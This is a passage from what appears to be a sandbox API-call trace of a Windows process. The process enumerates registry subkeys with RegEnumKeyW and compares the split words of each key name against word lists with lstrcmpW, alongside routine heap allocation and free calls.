(lpString1="common", lpString2="update") returned -1 [0155.733] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682fa0 [0155.733] lstrcmpW (lpString1="backup", lpString2="events") returned -1 [0155.733] lstrcmpW (lpString1="locker", lpString2="events") returned 1 [0155.734] lstrcmpW (lpString1="device", lpString2="events") returned -1 [0155.734] lstrcmpW (lpString1="common", lpString2="events") returned -1 [0155.734] lstrcmpW (lpString1="update", lpString2="events") returned 1 [0155.734] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x13, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceContainers") returned 0x0 [0155.734] lstrlenW (lpString="DeviceContainers") returned 16 [0155.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683040 [0155.734] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0155.734] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0155.734] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0155.734] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683040 | out: hHeap=0x660000) returned 1 [0155.734] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x675e80 [0155.734] lstrcmpW (lpString1="installers", lpString2="containers") returned 1 [0155.734] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x14, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceGuard") returned 0x0 [0155.735] lstrlenW (lpString="DeviceGuard") returned 11 [0155.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683158 [0155.735] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0155.735] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0155.735] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0155.735] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683158 | out: hHeap=0x660000) returned 1 [0155.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674640 [0155.735] lstrcmpW (lpString1="class", lpString2="guard") returned -1 [0155.735] lstrcmpW (lpString1="index", lpString2="guard") returned 1 [0155.735] lstrcmpW (lpString1="crash", lpString2="guard") returned -1 [0155.735] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x15, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceMigration") returned 0x0 [0155.735] lstrlenW (lpString="DeviceMigration") returned 15 [0155.735] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683040 [0155.736] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0155.736] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0155.736] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0155.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683040 | out: hHeap=0x660000) returned 1 [0155.736] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x683040 [0155.736] lstrcmpW (lpString1="readiness", lpString2="migration") returned 1 [0155.736] lstrcmpW (lpString1="container", lpString2="migration") returned -1 [0155.736] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x16, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0155.736] lstrlenW (lpString="DeviceOverrides") returned 15 [0155.736] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x683158 [0155.736] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0155.736] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0155.736] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0155.736] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x683158 | out: hHeap=0x660000) returned 1 [0155.737] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x683158 [0155.737] lstrcmpW (lpString1="readiness", lpString2="overrides") returned 1 [0155.737] lstrcmpW (lpString1="container", lpString2="overrides") returned -1 [0155.737] lstrcmpW (lpString1="migration", lpString2="overrides") returned -1 [0155.737] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x17, lpName=0x19fd50, cchName=0x104 | out: lpName="DevQuery") returned 0x0 [0155.737] lstrlenW (lpString="DevQuery") returned 8 [0155.737] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x6747a0 [0155.737] lstrcmpW (lpString1="app", lpString2="dev") returned -1 [0155.737] lstrcmpW (lpString1="bit", lpString2="dev") returned -1 [0155.737] lstrcmpW (lpString1="cmf", lpString2="dev") returned -1 [0155.737] lstrcmpW (lpString1="com", lpString2="dev") returned -1 [0155.737] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674820 [0155.737] lstrcmpW (lpString1="class", lpString2="query") returned -1 [0155.737] lstrcmpW (lpString1="index", lpString2="query") returned -1 [0155.738] lstrcmpW (lpString1="crash", lpString2="query") returned -1 [0155.738] lstrcmpW (lpString1="guard", lpString2="query") returned -1 [0155.738] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x18, lpName=0x19fd50, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0155.738] lstrlenW (lpString="Diagnostics") returned 11 [0155.738] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x675d30 [0155.738] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x19, lpName=0x19fd50, cchName=0x104 | out: lpName="DmaSecurity") returned 0x0 [0155.738] lstrlenW (lpString="DmaSecurity") returned 11 [0155.738] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674ba0 [0155.738] lstrcmpW (lpString1="app", lpString2="dma") returned -1 [0155.738] lstrcmpW (lpString1="bit", lpString2="dma") returned -1 [0155.738] lstrcmpW (lpString1="cmf", lpString2="dma") returned -1 [0155.738] lstrcmpW (lpString1="com", lpString2="dma") returned -1 [0155.738] lstrcmpW (lpString1="dev", lpString2="dma") returned -1 [0155.738] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x682e88 [0155.738] lstrcmpW (lpString1="arbiters", lpString2="security") returned -1 [0155.739] lstrcmpW (lpString1="settings", lpString2="security") returned 1 [0155.739] lstrcmpW (lpString1="computer", lpString2="security") returned -1 [0155.739] lstrcmpW (lpString1="property", lpString2="security") returned -1 [0155.739] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x1a, lpName=0x19fd50, cchName=0x104 | out: lpName="EarlyLaunch") returned 0x0 [0155.739] lstrlenW (lpString="EarlyLaunch") returned 11 [0155.739] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674c40 [0155.739] lstrcmpW (lpString1="class", lpString2="early") returned -1 [0155.739] lstrcmpW (lpString1="index", lpString2="early") returned 1 [0155.739] lstrcmpW (lpString1="crash", lpString2="early") returned -1 [0155.739] lstrcmpW (lpString1="guard", lpString2="early") returned 1 [0155.739] lstrcmpW (lpString1="query", lpString2="early") returned 1 [0155.739] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682d98 [0155.739] lstrcmpW (lpString1="backup", lpString2="launch") returned -1 [0155.739] lstrcmpW (lpString1="locker", lpString2="launch") returned 1 [0155.740] lstrcmpW (lpString1="device", lpString2="launch") returned -1 [0155.740] lstrcmpW (lpString1="common", lpString2="launch") returned -1 [0155.740] lstrcmpW (lpString1="update", lpString2="launch") returned 1 [0155.740] lstrcmpW (lpString1="events", lpString2="launch") returned -1 [0155.740] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x1b, lpName=0x19fd50, cchName=0x104 | out: lpName="EAS") returned 0x0 [0155.740] lstrlenW (lpString="EAS") returned 3 [0155.740] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674aa0 [0155.740] lstrcmpW (lpString1="app", lpString2="eas") returned -1 [0155.740] lstrcmpW (lpString1="bit", lpString2="eas") returned -1 [0155.740] lstrcmpW (lpString1="cmf", lpString2="eas") returned -1 [0155.740] lstrcmpW (lpString1="com", lpString2="eas") returned -1 [0155.740] lstrcmpW (lpString1="dev", lpString2="eas") returned -1 [0155.740] lstrcmpW (lpString1="dma", lpString2="eas") returned -1 [0155.740] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x1c, lpName=0x19fd50, cchName=0x104 | out: lpName="Els") returned 0x0 [0155.740] lstrlenW (lpString="Els") returned 3 [0155.740] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674ca0 [0155.741] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0155.741] lstrcmpW (lpString1="bit", lpString2="els") returned -1 [0155.741] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0155.741] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0155.741] lstrcmpW (lpString1="dev", lpString2="els") returned -1 [0155.741] lstrcmpW (lpString1="dma", lpString2="els") returned -1 [0155.741] lstrcmpW (lpString1="eas", lpString2="els") returned -1 [0155.741] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x1d, lpName=0x19fd50, cchName=0x104 | out: lpName="Errata") returned 0x0 [0155.741] lstrlenW (lpString="Errata") returned 6 [0155.741] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682c80 [0155.741] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0155.741] lstrcmpW (lpString1="locker", lpString2="errata") returned 1 [0155.741] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0155.741] lstrcmpW (lpString1="common", lpString2="errata") returned -1 [0155.741] lstrcmpW (lpString1="update", lpString2="errata") returned 1 [0155.742] lstrcmpW (lpString1="events", lpString2="errata") returned 1 [0155.742] lstrcmpW (lpString1="launch", lpString2="errata") returned 1 [0155.742] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x1e, lpName=0x19fd50, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0155.742] lstrlenW (lpString="FileSystem") returned 10 [0155.742] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x674c60 [0155.742] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0155.742] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0155.742] lstrcmpW (lpString1="glob", lpString2="file") returned 1 [0155.742] lstrcmpW (lpString1="user", lpString2="file") returned 1 [0155.742] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682af0 [0155.742] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0155.742] lstrcmpW (lpString1="locker", lpString2="system") returned -1 [0155.742] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0155.742] lstrcmpW (lpString1="common", lpString2="system") returned -1 [0155.742] lstrcmpW (lpString1="update", lpString2="system") returned 1 [0155.743] lstrcmpW (lpString1="events", lpString2="system") returned -1 [0155.743] lstrcmpW (lpString1="launch", lpString2="system") returned -1 [0155.743] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0155.743] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x1f, lpName=0x19fd50, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0155.743] lstrlenW (lpString="FileSystemUtilities") returned 19 [0155.743] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x674a40 [0155.743] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0155.743] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0155.743] lstrcmpW (lpString1="glob", lpString2="file") returned 1 [0155.743] lstrcmpW (lpString1="user", lpString2="file") returned 1 [0155.743] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0155.743] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674a40 | out: hHeap=0x660000) returned 1 [0155.743] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682a50 [0155.743] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0155.743] lstrcmpW (lpString1="locker", lpString2="system") returned -1 [0155.744] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0155.744] lstrcmpW (lpString1="common", lpString2="system") returned -1 [0155.744] lstrcmpW (lpString1="update", lpString2="system") returned 1 [0155.744] lstrcmpW (lpString1="events", lpString2="system") returned -1 [0155.744] lstrcmpW (lpString1="launch", lpString2="system") returned -1 [0155.744] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0155.744] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0155.744] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682a50 | out: hHeap=0x660000) returned 1 [0155.744] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x682aa0 [0155.744] lstrcmpW (lpString1="readiness", lpString2="utilities") returned -1 [0155.744] lstrcmpW (lpString1="container", lpString2="utilities") returned -1 [0155.744] lstrcmpW (lpString1="migration", lpString2="utilities") returned -1 [0155.744] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0155.744] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x20, lpName=0x19fd50, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0155.745] lstrlenW (lpString="GraphicsDrivers") returned 15 [0155.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x682b90 [0155.745] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0155.745] lstrcmpW (lpString1="settings", lpString2="graphics") returned 1 [0155.745] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0155.745] lstrcmpW (lpString1="property", lpString2="graphics") returned 1 [0155.745] lstrcmpW (lpString1="security", lpString2="graphics") returned 1 [0155.745] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682a78 [0155.774] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0155.775] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0155.775] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0155.775] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0155.775] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0155.775] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x21, lpName=0x19fd50, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0155.775] lstrlenW (lpString="GroupOrderList") returned 14 [0155.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674d80 [0155.775] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0155.775] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0155.775] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0155.775] lstrcmpW (lpString1="guard", lpString2="group") returned 1 [0155.775] lstrcmpW (lpString1="query", lpString2="group") returned 1 [0155.775] lstrcmpW (lpString1="early", lpString2="group") returned -1 [0155.775] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674a00 [0155.775] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0155.776] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0155.776] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0155.776] lstrcmpW (lpString1="guard", lpString2="order") returned -1 [0155.776] lstrcmpW (lpString1="query", lpString2="order") returned 1 [0155.776] lstrcmpW (lpString1="early", lpString2="order") returned -1 [0155.776] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0155.776] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x674b00 [0155.776] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0155.776] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0155.776] lstrcmpW (lpString1="glob", lpString2="list") returned -1 [0155.776] lstrcmpW (lpString1="user", lpString2="list") returned 1 [0155.776] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0155.776] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x22, lpName=0x19fd50, cchName=0x104 | out: lpName="HAL") returned 0x0 [0155.777] lstrlenW (lpString="HAL") returned 3 [0155.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674a20 [0155.777] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0155.777] lstrcmpW (lpString1="bit", lpString2="hal") returned -1 [0155.777] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0155.777] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0155.777] lstrcmpW (lpString1="dev", lpString2="hal") returned -1 [0155.777] lstrcmpW (lpString1="dma", lpString2="hal") returned -1 [0155.777] lstrcmpW (lpString1="eas", lpString2="hal") returned -1 [0155.777] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0155.777] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x23, lpName=0x19fd50, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0155.777] lstrlenW (lpString="IDConfigDB") returned 10 [0155.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x682b68 [0155.777] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0155.777] lstrcmpW (lpString1="settings", lpString2="idconfig") returned 1 [0155.778] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0155.778] lstrcmpW (lpString1="property", lpString2="idconfig") returned 1 [0155.778] lstrcmpW (lpString1="security", lpString2="idconfig") returned 1 [0155.778] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0155.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12) returned 0x674d40 [0155.778] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0155.778] lstrcmpW (lpString1="ci", lpString2="db") returned -1 [0155.778] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0155.778] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x24, lpName=0x19fd50, cchName=0x104 | out: lpName="InitialMachineConfig") returned 0x0 [0155.778] lstrlenW (lpString="InitialMachineConfig") returned 20 [0155.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682e60 [0155.778] lstrcmpW (lpString1="restore", lpString2="initial") returned 1 [0155.778] lstrcmpW (lpString1="arbiter", lpString2="initial") returned -1 [0155.778] lstrcmpW (lpString1="content", lpString2="initial") returned -1 [0155.778] lstrcmpW (lpString1="control", lpString2="initial") returned -1 [0155.778] lstrcmpW (lpString1="classes", lpString2="initial") returned -1 [0155.779] lstrcmpW (lpString1="drivers", lpString2="initial") returned -1 [0155.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682eb0 [0155.779] lstrcmpW (lpString1="restore", lpString2="machine") returned 1 [0155.779] lstrcmpW (lpString1="arbiter", lpString2="machine") returned -1 [0155.779] lstrcmpW (lpString1="content", lpString2="machine") returned -1 [0155.779] lstrcmpW (lpString1="control", lpString2="machine") returned -1 [0155.779] lstrcmpW (lpString1="classes", lpString2="machine") returned -1 [0155.779] lstrcmpW (lpString1="drivers", lpString2="machine") returned -1 [0155.779] lstrcmpW (lpString1="initial", lpString2="machine") returned -1 [0155.779] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682ed8 [0155.779] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0155.779] lstrcmpW (lpString1="locker", lpString2="config") returned 1 [0155.779] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0155.779] lstrcmpW (lpString1="common", lpString2="config") returned -1 [0155.779] lstrcmpW (lpString1="update", lpString2="config") returned 1 [0155.780] lstrcmpW (lpString1="events", lpString2="config") returned 1 [0155.780] lstrcmpW (lpString1="launch", lpString2="config") returned 1 [0155.780] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0155.780] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0155.780] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x25, lpName=0x19fd50, cchName=0x104 | out: lpName="IPMI") returned 0x0 [0155.780] lstrlenW (lpString="IPMI") returned 4 [0155.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x674bc0 [0155.780] lstrcmpW (lpString1="acpi", lpString2="ipmi") returned -1 [0155.780] lstrcmpW (lpString1="name", lpString2="ipmi") returned 1 [0155.780] lstrcmpW (lpString1="glob", lpString2="ipmi") returned -1 [0155.780] lstrcmpW (lpString1="user", lpString2="ipmi") returned 1 [0155.780] lstrcmpW (lpString1="file", lpString2="ipmi") returned -1 [0155.780] lstrcmpW (lpString1="list", lpString2="ipmi") returned 1 [0155.780] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x26, lpName=0x19fd50, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0155.780] lstrlenW (lpString="Keyboard Layout") returned 15 [0155.780] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x682dc0 [0155.780] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0155.781] lstrcmpW (lpString1="settings", lpString2="keyboard") returned 1 [0155.781] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0155.781] lstrcmpW (lpString1="property", lpString2="keyboard") returned 1 [0155.781] lstrcmpW (lpString1="security", lpString2="keyboard") returned 1 [0155.781] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0155.781] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0155.781] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682cf8 [0155.781] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0155.781] lstrcmpW (lpString1="locker", lpString2="layout") returned 1 [0155.781] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0155.781] lstrcmpW (lpString1="common", lpString2="layout") returned -1 [0155.781] lstrcmpW (lpString1="update", lpString2="layout") returned 1 [0155.781] lstrcmpW (lpString1="events", lpString2="layout") returned -1 [0155.781] lstrcmpW (lpString1="launch", lpString2="layout") returned -1 [0155.781] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0155.782] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0155.782] lstrcmpW (lpString1="config", lpString2="layout") returned -1 [0155.782] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x27, lpName=0x19fd50, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0155.782] lstrlenW (lpString="Keyboard Layouts") returned 16 [0155.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e) returned 0x682de8 [0155.782] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0155.782] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682de8 | out: hHeap=0x660000) returned 1 [0155.782] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682e10 [0155.783] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x28, lpName=0x19fd50, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0155.783] lstrlenW (lpString="Lsa") returned 3 [0155.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674c80 [0155.783] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x29, lpName=0x19fd50, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0155.783] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0155.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x6749e0 [0155.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6749e0 | out: hHeap=0x660000) returned 1 [0155.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x682c58 [0155.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1a) returned 0x682bb8 [0155.783] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682bb8 | out: hHeap=0x660000) returned 1 [0155.783] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x2a, lpName=0x19fd50, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0155.783] lstrlenW (lpString="LsaInformation") returned 14 [0155.783] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674ac0 [0155.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674ac0 | out: hHeap=0x660000) returned 1 [0155.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x675cd0 [0155.784] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x2b, lpName=0x19fd50, cchName=0x104 | out: lpName="ManufacturingMode") returned 0x0 [0155.784] lstrlenW (lpString="ManufacturingMode") returned 17 [0155.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28) returned 0x675dc0 [0155.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x674a40 [0155.784] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x2c, lpName=0x19fd50, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0155.784] lstrlenW (lpString="MediaCategories") returned 15 [0155.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674a60 [0155.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x675eb0 [0155.784] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x2d, lpName=0x19fd50, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0155.784] lstrlenW (lpString="MediaInterfaces") returned 15 [0155.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674d00 [0155.784] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674d00 | out: hHeap=0x660000) returned 1 [0155.784] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x675ca0 [0155.784] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x2e, lpName=0x19fd50, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0155.785] lstrlenW (lpString="MediaProperties") returned 15 [0155.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674a80 [0155.785] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674a80 | out: hHeap=0x660000) returned 1 [0155.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x22) returned 0x675f10 [0155.785] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x2f, lpName=0x19fd50, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0155.785] lstrlenW (lpString="MSDTC") returned 5 [0155.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674cc0 [0155.785] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x30, lpName=0x19fd50, cchName=0x104 | out: lpName="MUI") returned 0x0 [0155.785] lstrlenW (lpString="MUI") returned 3 [0155.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x6749e0 [0155.785] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x31, lpName=0x19fd50, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0155.785] lstrlenW (lpString="NetDiagFx") returned 9 [0155.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674a80 [0155.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16) returned 0x674ae0 [0155.785] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12) returned 0x674b20 [0155.786] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x32, lpName=0x19fd50, cchName=0x104 | out: lpName="NetDrivers") returned 0x0 [0155.786] lstrlenW (lpString="NetDrivers") returned 10 [0155.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674ce0 [0155.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674ce0 | out: hHeap=0x660000) returned 1 [0155.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x682cd0 [0155.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x682cd0 | out: hHeap=0x660000) returned 1 [0155.786] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x33, lpName=0x19fd50, cchName=0x104 | out: lpName="NetProvision") returned 0x0 [0155.786] lstrlenW (lpString="NetProvision") returned 12 [0155.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674b40 [0155.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674b40 | out: hHeap=0x660000) returned 1 [0155.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x682f00 [0155.786] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x34, lpName=0x19fd50, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0155.786] lstrlenW (lpString="NetTrace") returned 8 [0155.786] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x674b40 [0155.786] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674b40 | out: hHeap=0x660000) returned 1 [0155.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x674ac0 [0155.787] RegEnumKeyW (in: hKey=0x20c, dwIndex=0x35, lpName=0x19fd50, cchName=0x104 | out: lpName="Network") returned 0x0 [0155.787] lstrlenW (lpString="Network") returned 7 [0155.787] RtlAllocateHeap 